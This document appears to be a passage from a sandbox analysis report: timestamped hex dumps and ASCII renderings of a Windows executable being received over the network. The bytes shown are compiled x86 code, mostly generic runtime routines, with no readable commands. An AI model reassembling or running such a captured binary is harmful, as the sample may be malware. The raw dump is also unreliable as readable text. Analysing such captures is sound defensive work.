                                                                                                                2022-10-13 11:08:14 UTC4225INData Raw: 02 02 00 00 0f b6 72 12 0f b6 41 12 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 e0 01 00 00 0f b6 72 13 0f b6 41 13 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 be 01 00 00 8b 42 14 3b 41 14 0f 84 87 00 00 00 0f b6 f0 0f b6 41 14 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 91 01 00 00 0f b6 72 15 0f b6 41 15 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 6f 01 00 00 0f b6 72 16 0f b6 41 16 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 4d 01 00 00 0f b6 72 17 0f b6 41 17 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 2b 01 00 00 8b 42 18 3b 41 18 0f 84 87 00 00 00 0f b6 f0 0f b6 41 18 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff
                                                                                                                Data Ascii: rA+t34ErA+t34EB;AA+t34ErA+t34EorA+t34EMrA+t34E+B;AA+t34E
                                                                                                                2022-10-13 11:08:14 UTC4241INData Raw: 02 00 00 8b 45 0c 8d 4d f0 50 e8 93 f6 ff ff 8b 55 ec b9 00 7c 00 00 8b c2 23 c1 89 45 cc 85 f6 75 7b 3d 00 68 00 00 74 61 3d 00 70 00 00 74 5a 3d 00 60 00 00 75 66 8b 45 f0 8d 4d f8 89 45 f8 8b 45 f4 6a 7b c7 45 c4 dc 5c 47 00 c7 45 c8 02 00 00 00 89 45 fc e8 9e f6 ff ff 8d 45 ac 57 50 e8 d3 1e 00 00 59 59 8d 45 ac 50 8d 45 d4 50 8d 4d f8 e8 31 f5 ff ff 8d 4d c4 51 ff 75 08 8b c8 e8 01 f5 ff ff e9 ba f8 ff ff 8d 45 f0 50 ff 75 08 e8 53 53 00 00 59 59 e9 a7 f8 ff ff 8b c2 25 00 fc 00 00 3b c1 75 0e 8d 45 f0 50 ff 75 08 e8 d4 52 00 00 eb e0 8b fa 8b da 81 e7 00 60 00 00 81 e3 00 18 00 00 33 c0 89 7d e4 85 f6 74 08 81 fb 00 08 00 00 eb 02 85 ff 0f 94 c0 8b ca 81 e1 00 10 00 00 89 4d b8 8b ca 81 e1 00 04 00 00 85 c0 89 4d c0 8b c1 75 03 8b 45 b8 85 c0 74 31
                                                                                                                Data Ascii: EMPU|#Eu{=hta=ptZ=`ufEMEEj{E\GEEEWPYYEPEPM1MQuEPuSSYY%;uEPuR`3}tMMuEt1
                                                                                                                2022-10-13 11:08:14 UTC4257INData Raw: 00 c6 46 04 02 eb 4b 83 3e 00 6a 01 75 09 8b ce e8 8d b4 ff ff eb 3b 8d 4d a0 c7 45 f0 c8 5b 47 00 c7 45 f4 02 00 00 00 e8 a7 b1 ff ff 8d 4d f0 51 8d 4d a8 51 8b c8 e8 4a b5 ff ff 56 8d 4d b0 51 8b c8 e8 60 b5 ff ff 8b 08 89 0e 8b 48 04 89 4e 04 5f 8b c6 5e 5b c9 c3 55 8b ec 83 ec 20 8d 45 f8 53 56 8b 75 08 57 33 ff 57 6a 01 50 89 3e 89 7e 04 e8 c5 14 00 00 83 c4 0c 8b 08 8b d1 89 0e 8b 40 04 84 c0 89 46 04 a1 8c c8 4b 00 75 4d 8a 18 84 db 74 47 80 fb 40 74 42 8d 45 f0 c7 45 f8 c8 5b 47 00 50 c7 45 fc 02 00 00 00 e8 e9 fb ff ff 59 8d 4d f8 51 8d 4d e8 51 8b c8 e8 c4 b4 ff ff 56 8d 4d e0 51 8b c8 e8 da b4 ff ff 8b 10 89 16 8b 40 04 89 46 04 a1 8c c8 4b 00 8a 08 80 f9 40 75 08 40 a3 8c c8 4b 00 eb 59 84 c9 74 0b 89 7e 04 c6 46 04 02 89 3e eb 4a 6a 01 85 d2
                                                                                                                Data Ascii: FK>ju;ME[GEMQMQJVMQ`HN_^[U ESVuW3WjP>~@FKuMtG@tBEE[GPEYMQMQVMQ@FK@u@KYt~F>Jj
                                                                                                                2022-10-13 11:08:14 UTC4273INData Raw: 8b 41 14 8a 48 fc 8b 45 08 88 08 b0 01 5d c2 04 00 8b ff 55 8b ec 83 b9 5c 04 00 00 01 75 0d 83 41 14 04 8b 49 14 0f b7 41 fc eb 4f 8b 91 a8 0a 00 00 83 fa 63 76 14 e8 b3 36 01 00 c7 00 16 00 00 00 e8 99 fc 00 00 32 c0 eb 3b 03 d2 83 b9 58 04 00 00 01 75 1b ff 71 2c 0f b6 41 31 50 8d 81 64 04 00 00 6a 01 8d 04 d0 50 e8 23 df 00 00 eb 15 8b 84 d1 6c 04 00 00 0f b7 00 8b 4d 08 99 89 01 b0 01 89 51 04 5d c2 04 00 8b ff 55 8b ec 83 b9 5c 04 00 00 01 75 0d 83 41 14 04 8b 49 14 0f b7 41 fc eb 4f 8b 91 a8 0a 00 00 83 fa 63 76 14 e8 3a 36 01 00 c7 00 16 00 00 00 e8 20 fc 00 00 32 c0 eb 3b 03 d2 83 b9 58 04 00 00 01 75 1b ff 71 2c 0f b6 41 31 50 8d 81 64 04 00 00 6a 01 8d 04 d0 50 e8 f5 de 00 00 eb 15 8b 84 d1 6c 04 00 00 0f b7 00 8b 4d 08 99 89 01 b0 01 89 51 04
                                                                                                                Data Ascii: AHE]U\uAIAOcv62;Xuq,A1PdjP#lMQ]U\uAIAOcv:6 2;Xuq,A1PdjPlMQ
                                                                                                                2022-10-13 11:08:14 UTC4289INData Raw: c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff
                                                                                                                Data Ascii: @3@3@3@jXjXjX3@3@3@3@3@jXjXjX3@3@3@3@3@jXjXjX3@3@3@3@3@jXjXjX3@UEA ]UEA ]UEA ]UEA ]UEA ]UEA ]UEA ]
                                                                                                                2022-10-13 11:08:14 UTC4305INData Raw: 07 74 56 48 83 e8 01 75 e3 53 8b ce e8 f9 2f 00 00 eb d1 8b ce e8 31 19 00 00 eb c8 83 f8 70 7f 4d 74 3f 83 f8 67 7e 31 83 f8 69 74 1c 83 f8 6e 74 0e 83 f8 6f 75 b5 8b ce e8 0a 4d 00 00 eb a4 8b ce e8 27 48 00 00 eb 9b 83 4e 20 10 53 6a 0a 8b ce e8 17 3a 00 00 eb 8b 8b ce e8 82 20 00 00 eb 82 8b ce e8 3e 4e 00 00 e9 76 ff ff ff 83 e8 73 0f 84 66 ff ff ff 48 83 e8 01 74 d0 83 e8 03 0f 85 66 ff ff ff 53 e9 69 ff ff ff 38 5e 30 0f 85 2e 01 00 00 8b cb 66 89 5d fc 88 5d fe 33 d2 8b 5e 20 42 8b c3 89 4d f8 c1 e8 04 84 c2 74 2f 8b c3 c1 e8 06 84 c2 74 06 c6 45 fc 2d eb 08 84 da 74 0b c6 45 fc 2b 8b ca 89 4d f8 eb 11 8b c3 d1 e8 84 c2 74 09 c6 45 fc 20 8b ca 89 55 f8 8a 56 31 80 fa 78 74 05 80 fa 58 75 0d 8b c3 c1 e8 05 a8 01 74 04 b3 01 eb 02 32 db 80 fa 61 74
                                                                                                                Data Ascii: tVHuS/1pMt?g~1itntouM'HN Sj: >NvsfHtfSi8^0.f]]3^ BMt/tE-tE+MtE UV1xtXut2at
                                                                                                                2022-10-13 11:08:14 UTC4321INData Raw: 00 59 8b c8 89 45 fc 83 e9 01 0f 84 81 00 00 00 83 e9 01 74 5e 49 83 e9 01 74 3a 83 e9 04 74 17 e8 ca 76 00 00 c7 00 16 00 00 00 e8 b0 3c 00 00 32 c0 e9 2f 01 00 00 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 3d 52 ff ff eb 5f e8 ce 54 ff ff eb 58 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 f5 42 ff ff eb 41 e8 54 45 ff ff eb 3a 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 f7 3c ff ff eb 23 e8 74 40 ff ff eb 1c 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 19 38 ff ff eb 05 e8 72 3a ff ff 84 c0 0f 84 7b ff ff ff 8b ce e8 78 99 ff ff 84 c0 0f 84 a0 00 00 00 8b 4e 20 8b c1 53 8b 5d f8 c1 e8 04 57 8b 7d f4 a8 01 74 17 85 db 7f 13 7c 04 85 ff 73 0d f7 df 83 d3 00 f7 db 83 c9 40 89 4e 20 83 7e 28 00 7d 09 c7 46 28 01 00 00 00 eb 11 ff
                                                                                                                Data Ascii: YEt^It:tv<2/F EPt=R_TXF EPtBATE:F EPt<#t@F EPt8r:{xN S]W}t|s@N ~(}F(
                                                                                                                2022-10-13 11:08:14 UTC4337INData Raw: 89 02 33 c0 5d c3 8b ff 55 8b ec 8b 45 08 83 c0 20 50 ff 15 0c 30 47 00 5d c3 8b ff 55 8b ec 8b 45 08 83 c0 20 50 ff 15 10 30 47 00 5d c3 8b 01 8b 40 0c 90 c1 e8 0d 24 01 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 15 e8 a3 36 00 00 c7 00 16 00 00 00 e8 89 fc ff ff 83 c8 ff eb 52 8b 46 0c 57 83 cf ff 90 c1 e8 0d a8 01 74 39 56 e8 f7 05 00 00 56 8b f8 e8 69 75 01 00 56 e8 dd 53 01 00 50 e8 38 77 01 00 83 c4 10 85 c0 79 05 83 cf ff eb 13 83 7e 1c 00 74 0d ff 76 1c e8 e5 31 01 00 83 66 1c 00 59 56 e8 df 78 01 00 59 8b c7 5f 5e 5d c3 6a 10 68 10 6c 48 00 e8 82 08 fe ff 8b 75 08 89 75 e0 85 f6 75 15 e8 23 36 00 00 c7 00 16 00 00 00 e8 09 fc ff ff 83 c8 ff eb 3c 8b 46 0c 90 c1 e8 0c 56 a8 01 74 08 e8 9c 78 01 00 59 eb e7 83 65 e4 00 e8 0d ff ff ff 59 83 65 fc 00 56
                                                                                                                Data Ascii: 3]UE P0G]UE P0G]@$UVuu6RFWt9VViuVSP8wy~tv1fYVxY_^]jhlHuuu#6<FVtxYeYeV
                                                                                                                2022-10-13 11:08:14 UTC4353INData Raw: 8b 4d 0c 89 0a 8b 4d fc 33 cd e8 49 be fd ff c9 c3 8b ff 55 8b ec 83 ec 1c 53 56 8b 75 0c 8b ce 57 e8 3c 5c 00 00 84 c0 0f 84 e9 01 00 00 8b 1e 8b 7d 08 89 5d ec 8a 0b 8d 43 01 eb 05 8b 06 8a 08 40 57 89 06 0f b6 c1 6a 08 50 88 4d fb e8 6b 5e 00 00 83 c4 0c 85 c0 75 e3 8b 55 10 8a 4d fb 81 c2 08 03 00 00 80 f9 2d 89 55 f0 0f 94 c0 88 02 74 05 80 f9 2b 75 0a 8b 06 8a 08 40 88 4d fb 89 06 80 f9 49 0f 84 62 03 00 00 80 f9 69 0f 84 59 03 00 00 80 f9 4e 0f 84 3d 03 00 00 80 f9 6e 0f 84 34 03 00 00 33 db 88 5d ff 80 f9 30 75 34 8b 3e 8a 07 8d 57 01 88 45 e8 89 16 3c 78 74 13 3c 58 74 0f ff 75 e8 8b ce e8 3d 5b 00 00 8a 4d fb eb 11 8a 0a 8d 42 01 c6 45 ff 01 88 4d fb 89 06 89 7d ec 8b 45 10 8a eb 83 c0 08 89 45 e8 8b f8 80 f9 30 75 11 b5 01 8b 06 8a 08 40 88 4d
                                                                                                                Data Ascii: MM3IUSVuW<\}]C@WjPMk^uUM-Ut+u@MIbiYN=n43]0u4>WE<xt<Xtu=[MBEM}EE0u@M
                                                                                                                2022-10-13 11:08:14 UTC4369INData Raw: ff ff 42 46 89 95 c8 f6 ff ff 3b d1 75 a9 85 db 74 34 83 fe 73 0f 84 04 01 00 00 3b f0 75 11 83 a4 b5 90 fa ff ff 00 8d 46 01 89 85 8c fa ff ff 8b c3 33 db 01 84 b5 90 fa ff ff 8b 85 8c fa ff ff 13 db 46 eb c8 83 fe 73 0f 84 d0 00 00 00 8b 9d cc f6 ff ff 8b b5 dc f6 ff ff 47 3b fb 0f 85 1b ff ff ff 89 85 bc f8 ff ff c1 e0 02 50 8d 85 90 fa ff ff 50 8d 85 c0 f8 ff ff 68 cc 01 00 00 50 e8 ce 1e 00 00 83 c4 10 b0 01 8b 8d bc f8 ff ff 89 8d e4 f6 ff ff 84 c0 0f 84 b2 00 00 00 8b 85 d8 f6 ff ff 2b 85 d0 f6 ff ff 89 85 d8 f6 ff ff 0f 85 6f fc ff ff 8b 9d 5c fc ff ff 8b 95 c0 f6 ff ff 85 d2 0f 84 48 01 00 00 8b 04 95 fc 7d 47 00 89 85 c0 f6 ff ff 85 c0 0f 85 83 00 00 00 50 89 85 d4 f4 ff ff 89 85 bc f8 ff ff 8d 85 d8 f4 ff ff 50 8d 85 c0 f8 ff ff 68 cc 01 00 00
                                                                                                                Data Ascii: BF;ut4s;uF3FsG;PPhP+o\H}GPPh
                                                                                                                2022-10-13 11:08:14 UTC4385INData Raw: 01 8a 01 41 84 c0 75 f9 2b ca 46 03 f1 83 7d f8 01 75 29 8b 45 fc 8d 0c 33 89 8b a8 00 00 00 ff b0 a8 00 00 00 8b 45 f0 2b c6 50 51 e8 92 5b 00 00 83 c4 0c 85 c0 0f 85 0a 04 00 00 8b 45 fc 8b 88 a8 00 00 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8b 55 f8 8d 59 01 8b 4d f4 03 de 83 fa 01 75 15 8b 45 fc 8b 80 ac 00 00 00 89 81 ac 00 00 00 89 b9 b0 00 00 00 8b 75 fc 89 7d e8 81 c6 b4 00 00 00 eb 01 43 f6 c3 01 75 fa 83 fa 01 75 28 8b c3 d1 e8 8d 0c 41 8b 45 ec 89 0c 06 8b 45 f0 ff 36 2b c3 d1 e8 50 51 e8 75 f2 00 00 83 c4 0c 85 c0 0f 85 8f 03 00 00 8b 0e 8d 51 02 66 8b 01 83 c1 02 66 3b c7 75 f5 8b 45 e8 2b ca 8b 55 f8 83 c6 04 d1 f9 8d 1c 4b 8b 4d f4 83 c3 02 40 89 45 e8 83 f8 07 72 9f 8b 75 fc 89 7d e8 81 c6 d0 00 00 00 eb 01 43 f6 c3 01 75 fa 83 7d f8 01 75
                                                                                                                Data Ascii: Au+F}u)E3E+PQ[EQAu+UYMuEu}Cuu(AEE6+PQuQff;uE+UKM@Eru}Cu}u
                                                                                                                2022-10-13 11:08:14 UTC4401INData Raw: 8d 85 30 fe ff ff 50 e8 50 0d 00 00 59 59 84 c0 0f 84 6c 01 00 00 8d 85 50 ff ff ff 50 e8 b1 70 00 00 85 c0 0f 84 58 01 00 00 66 8b 85 30 ff ff ff 66 85 c0 0f 84 87 00 00 00 0f b7 c8 8d 41 bf 83 f8 19 77 03 83 c1 20 6a 38 5a 83 f9 75 75 41 0f b7 8d 32 ff ff ff 8d 41 bf 83 f8 19 77 03 83 c1 20 83 f9 74 75 2a 0f b7 8d 34 ff ff ff 8d 41 bf 83 f8 19 77 03 83 c1 20 83 f9 66 75 13 66 39 95 36 ff ff ff 75 0a 66 83 bd 38 ff ff ff 00 74 29 66 83 bd 36 ff ff ff 2d 0f 85 e3 00 00 00 66 39 95 38 ff ff ff 0f 85 d6 00 00 00 66 83 bd 3a ff ff ff 00 0f 85 c8 00 00 00 b8 e9 fd 00 00 eb 0d 8d 85 50 ff ff ff 50 e8 60 0c 00 00 59 47 0f b7 c0 57 56 89 03 8b 9d 28 fe ff ff 68 83 00 00 00 53 e8 93 e5 00 00 83 c4 10 85 c0 0f 85 b0 00 00 00 8d 8d 50 ff ff ff 8d 51 02 66 8b 01 83
                                                                                                                Data Ascii: 0PPYYlPPpXf0fAw j8ZuuA2Aw tu*4Aw fuf96uf8t)f6-f98f:PP`YGWV(hSPQf
                                                                                                                2022-10-13 11:08:14 UTC4417INData Raw: 01 8b c1 5d c2 04 00 8b ff 56 8b f1 ff 15 88 30 47 00 89 06 8b c6 5e c3 8b ff 56 8b f1 ff 36 e8 60 f2 ff ff 83 26 00 59 5e c3 ff 31 ff 15 8c 30 47 00 c3 83 39 00 0f 95 c0 c3 ff 31 e8 99 bd fe ff 59 c3 ff 31 e8 d8 bd fe ff 59 c3 ff 31 e8 87 bd fe ff 59 c3 8b 41 04 8b 00 ff 30 8b 01 ff 30 e8 69 03 00 00 59 59 c3 8b 01 8b 00 8b 48 48 85 c9 74 18 83 c8 ff f0 0f c1 01 75 0f 81 f9 78 85 48 00 74 07 51 e8 fa f1 ff ff 59 c3 ff 31 e8 8f bd fe ff 59 c3 ff 31 e8 3e bd fe ff 59 c3 ff 31 e8 7d bd fe ff 59 c3 ff 31 e8 2c bd fe ff 59 c3 8b 01 6a 00 ff 30 e8 13 03 00 00 59 59 c3 8b 01 8b 00 8b 40 48 f0 ff 00 c3 ff 31 e8 52 bd fe ff 59 c3 8b ff 55 8b ec 83 ec 14 8b 45 08 33 c9 41 6a 43 89 48 18 8b 45 08 c7 00 60 80 47 00 8b 45 08 89 88 50 03 00 00 8b 45 08 59 6a 05 c7 40
                                                                                                                Data Ascii: ]V0G^V6`&Y^10G91Y1Y1YA00iYYHHtuxHtQY1Y1>Y1}Y1,Yj0YY@H1RYUE3AjCHE`GEPEYj@
                                                                                                                2022-10-13 11:08:14 UTC4433INData Raw: 00 00 00 8b 4d 84 e9 7c fd ff ff 85 d2 7e 25 8b f1 8b 45 b4 8b 0c 85 10 d4 4b 00 8a 04 3b 03 ce 8b 75 dc 03 cb 43 88 44 31 2e 8b 75 d8 3b da 7c e0 8b 75 ac 03 f2 80 7d c8 00 89 75 ac eb 50 85 d2 7e f1 8b 75 d8 8b 45 b4 8b 0c 85 10 d4 4b 00 8a 04 3b 03 ce 88 44 19 2e 43 3b da 7c e8 eb d1 8b 55 b4 8b 4d d8 8a 5d e3 8b 04 95 10 d4 4b 00 88 5c 01 2e 8b 04 95 10 d4 4b 00 80 4c 01 2d 04 46 eb b3 ff 15 88 30 47 00 89 45 a8 38 5d c8 74 0a 8b 45 bc 83 a0 50 03 00 00 fd 8b 45 08 8d 75 a8 8b 4d fc 8b f8 33 cd a5 a5 a5 5f 5e 5b e8 a5 7d fc ff c9 c3 8b ff 55 8b ec 51 53 56 8b 75 08 33 c0 57 8b fe ab ab ab 8b 7d 0c 8b 45 10 03 c7 89 45 fc 3b f8 73 3f 0f b7 1f 53 e8 d8 04 01 00 59 66 3b c3 75 28 83 46 04 02 83 fb 0a 75 15 6a 0d 5b 53 e8 c0 04 01 00 59 66 3b c3 75 10 ff
                                                                                                                Data Ascii: M|~%EK;uCD1.u;|u}uP~uEK;D.C;|UM]K\.KL-F0GE8]tEPEuM3_^[}UQSVu3W}EE;s?SYf;u(Fuj[SYf;u
                                                                                                                2022-10-13 11:08:14 UTC4449INData Raw: 80 0f 83 b2 08 00 00 f2 0f 5c e6 f2 0f 5c d4 66 0f 12 25 88 93 47 00 66 0f 54 d9 66 0f 54 e6 f2 0f 5c c2 66 0f 57 d2 ba 60 40 00 00 66 0f c4 d2 03 f2 0f 10 eb f2 0f 59 dc f2 0f 5c f4 f2 0f 5c cd f2 0f 59 da f2 0f 59 ee 66 0f 28 15 a0 f5 47 00 f2 0f 59 e1 f2 0f 2d c3 f2 0f 59 f1 66 0f 28 0d b0 f5 47 00 f2 0f 58 ec 66 0f 70 e6 ee f2 0f 58 ee ba 7f ff 01 00 2b d0 05 ff e1 01 00 0b d0 2d ff e1 01 00 83 fa 00 0f 8e af 05 00 00 03 c8 83 e0 7f 83 e1 80 81 c1 80 ff 01 00 f2 0f 58 e0 f2 0f 10 c3 f2 0f 58 1d 20 93 47 00 66 0f 59 d7 f2 0f 5c 1d 20 93 47 00 66 0f 59 ff f2 0f 5c c3 03 c0 03 c0 03 c0 03 c0 66 0f 28 98 c0 f5 47 00 66 0f 28 35 60 93 47 00 66 0f 59 cf 66 0f 58 d1 66 0f 70 ca ee f2 0f 59 d7 66 0f 57 ff ba 80 3f 00 00 f2 0f 58 d1 66 0f c4 fa 03 f2 0f 58 d4
                                                                                                                Data Ascii: \\f%GfTfT\fW`@fY\\YYf(GY-Yf(GXfpX+-XX GfY\ GfY\f(Gf(5`GfYfXfpYfW?XfX
                                                                                                                2022-10-13 11:08:14 UTC4465INData Raw: 0f c1 06 75 0f 81 fe 78 85 48 00 74 07 56 e8 71 32 ff ff 59 8b 33 89 77 48 89 75 e4 f0 ff 06 c7 45 fc fe ff ff ff e8 05 00 00 00 eb ad 8b 75 e4 6a 05 e8 eb fd fd ff 59 c3 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 e8 5f 37 fe ff cc 8b c1 c3 80 3d f0 d7 4b 00 00 75 3c c7 05 e8 d7 4b 00 78 85 48 00 c7 05 e4 d7 4b 00 a0 88 48 00 c7 05 e0 d7 4b 00 98 87 48 00 e8 99 44 ff ff 68 e8 d7 4b 00 50 6a 01 6a fd e8 0e fe ff ff 83 c4 10 c6 05 f0 d7 4b 00 01 b0 01 c3 68 e8 d7 4b 00 e8 b6 43 ff ff 50 e8 05 ff ff ff 59 59 c3 a1 e4 d7 4b 00 c3 a1 e0 d7 4b 00 c3 8b ff 55 8b ec 83 ec 10 56 33 f6 8d 4d f0 56 e8 78 31 fd ff 8b 45 f8 39 70 08 74 03 8b 70 04 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c6 5e c9 c3 8b ff 55 8b ec 68 e8 d7 4b 00 e8 5e 43 ff ff 50
                                                                                                                Data Ascii: uxHtVq2Y3wHuEujYMdY_^[_7=Ku<KxHKHKHDhKPjjKhKCPYYKKUV3MVx1E9ptp}tMP^UhK^CP
                                                                                                                2022-10-13 11:08:14 UTC4481INData Raw: 74 32 8b c1 83 e0 01 c1 e0 04 f6 c1 04 74 03 83 c8 08 f6 c1 08 74 03 83 c8 04 f6 c1 10 74 03 83 c8 02 f6 c1 20 74 03 83 c8 01 f6 c1 02 74 05 0d 00 00 08 00 5d c3 8b ff 55 8b ec 51 51 0f ae 5d fc 8b 45 fc 83 e0 c0 89 45 f8 0f ae 55 f8 8b 4d fc 33 c0 f6 c1 3f 74 32 8b c1 83 e0 01 c1 e0 04 f6 c1 04 74 03 83 c8 08 f6 c1 08 74 03 83 c8 04 f6 c1 10 74 03 83 c8 02 f6 c1 20 74 03 83 c8 01 f6 c1 02 74 05 0d 00 00 08 00 c9 c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 0c 56 57 8b 7d 10 85 ff 0f 84 65 01 00 00 9b d9 7d f8 66 8b 45 f8 0f b7 d0 83 e2 01 c1 e2 04 a8 04 74 03 83 ca 08 a8 08 74 03 83 ca 04 a8 10 74 03 83 ca 02 a8 20 74 03 83 ca 01 a8 02 74 06 81 ca 00 00 08 00 0f b7 f0 8b ce 81 e1 00 0c 00 00 74 2e 81 f9 00 04 00 00 74 20 81 f9 00 08 00 00 74 10 81 f9 00 0c 00 00
                                                                                                                Data Ascii: t2ttt tt]UQQ]EEUM3?t2ttt ttUS]VW}e}fEttt ttt.t t
                                                                                                                2022-10-13 11:08:14 UTC4497INData Raw: 83 e0 40 5d c3 e8 e5 b6 fd ff c7 00 09 00 00 00 e8 cb 7c fd ff 33 c0 5d c3 8b ff 55 8b ec 53 8b 5d 08 f6 c3 18 74 03 83 cb 20 8b c3 c1 e8 05 83 e0 01 f6 c3 10 74 03 83 c8 02 f6 c3 08 74 03 83 c8 04 f6 c3 04 74 03 83 c8 08 56 8b f3 83 e6 01 74 03 83 c8 10 50 e8 86 19 00 00 09 45 0c 8d 45 0c 6a 1f 50 e8 8f 40 00 00 83 c4 0c 85 f6 5e 74 0d e8 79 b6 fd ff c7 00 21 00 00 00 eb 10 f6 c3 1c 74 0b e8 67 b6 fd ff c7 00 22 00 00 00 5b 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 bb ff 07 00 00 57 0f b7 56 06 8b c2 8b ca c1 e8 04 23 c3 0f b7 f8 66 3b c3 75 26 f6 c2 0f 75 19 33 c0 66 39 46 04 75 11 66 39 46 02 75 0b 66 39 06 75 06 40 e9 bd 00 00 00 6a 02 58 e9 b5 00 00 00 f7 c1 ff 7f ff ff 75 13 33 c0 66 39 46 04 75 0b 66 39 46 02 75 05 66 39 06 74 12 b8 33 04 00 00 2b c7
                                                                                                                Data Ascii: @]|3]US]t tttVtPEEjP@^ty!tg"[]UQSVuWV#f;u&u3f9Fuf9Fuf9u@jXu3f9Fuf9Fuf9t3+
                                                                                                                2022-10-13 11:08:14 UTC4513INData Raw: 08 00 00 74 4c 3d ff 0b 00 00 7c 7d 66 0f f3 ca 3d 32 0c 00 00 7f 0b 66 0f d6 4c 24 04 dd 44 24 04 c3 66 0f 2e ff 7b 24 ba ec 03 00 00 83 ec 10 89 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 c9 db ff ff 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 40 fe 47 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 80 fe 47 00 c3 66 0f c2 1d 60 fe 47 00 06 66 0f 54 1d 40 fe 47 00 66 0f d6 5c 24 04 dd 44 24 04 c3 8b ff 55 8b ec 8b 45 08 8b 4d 0c 21 08 5d c3 8b ff 55 8b ec 57 8b 7d 0c 83 e7 1f 75 07 8b 45 08 21 38 eb 17 56 e8 25 d9 ff ff 57 8b f0 e8 03 d9 ff ff 59 8b 4d 08 23 c6 5e 89 01 33 c0 5f 5d c3 8b ff 55 8b ec 8b 45 08 f7 d0 5d c3 8b ff 55 8b ec 8b 45
                                                                                                                Data Ascii: tL=|}f=2fL$D$f.{$T$T$T$$D$~D$ff(f=|%=2fT@GXfL$D$Gf`GfT@Gf\$D$UEM!]UW}uE!8V%WYM#^3_]UE]UE
                                                                                                                2022-10-13 11:08:14 UTC4529INData Raw: 90 8b 54 24 08 8d 42 0c 8b 4a b4 33 c8 e8 46 fe fa ff b8 24 50 48 00 e9 c8 13 fb ff 6a 08 ff 75 f0 e8 75 fe fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 17 fe fa ff b8 3c 53 48 00 e9 99 13 fb ff 6a 08 ff 75 f0 e8 46 fe fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 e8 fd fa ff b8 44 47 48 00 e9 6a 13 fb ff 6a 08 ff 75 f0 e8 17 fe fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 b9 fd fa ff b8 c4 55 48 00 e9 3b 13 fb ff 6a 08 ff 75 f0 e8 e8 fd fa ff 59 59 c3 cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a b8 33 c8 e8 8a fd fa ff b8 cc 49 48 00 e9 0c 13 fb ff 6a 18 ff 75 ec e8 b9 fd fa ff 59 59 c3 8b 45 f0 83 e0 01 0f 84 0c 00 00 00 83 65 f0 fe 8d 4d b8 e9 2c 0d f9 ff c3 8b
                                                                                                                Data Ascii: T$BJ3F$PHjuuYYT$BJ3<SHjuFYYT$BJ3DGHjjuYYT$BJ3UH;juYYT$BJ3IHjuYYEeM,
                                                                                                                2022-10-13 11:08:14 UTC4545INData Raw: 08 48 00 01 00 00 00 68 56 47 00 02 00 00 00 6c 56 47 00 02 00 00 00 70 56 47 00 01 00 00 00 74 56 47 00 02 00 00 00 78 56 47 00 02 00 00 00 7c 56 47 00 02 00 00 00 80 56 47 00 08 00 00 00 8c 56 47 00 02 00 00 00 68 39 47 00 01 00 00 00 90 56 47 00 02 00 00 00 94 56 47 00 02 00 00 00 d0 4f 47 00 01 00 00 00 98 56 47 00 01 00 00 00 9c 56 47 00 01 00 00 00 a0 56 47 00 03 00 00 00 a4 56 47 00 01 00 00 00 a8 56 47 00 01 00 00 00 ac 56 47 00 01 00 00 00 b0 56 47 00 02 00 00 00 b4 56 47 00 01 00 00 00 b8 56 47 00 02 00 00 00 bc 56 47 00 01 00 00 00 c0 56 47 00 02 00 00 00 c4 56 47 00 01 00 00 00 c8 56 47 00 01 00 00 00 cc 56 47 00 01 00 00 00 d0 56 47 00 02 00 00 00 d4 56 47 00 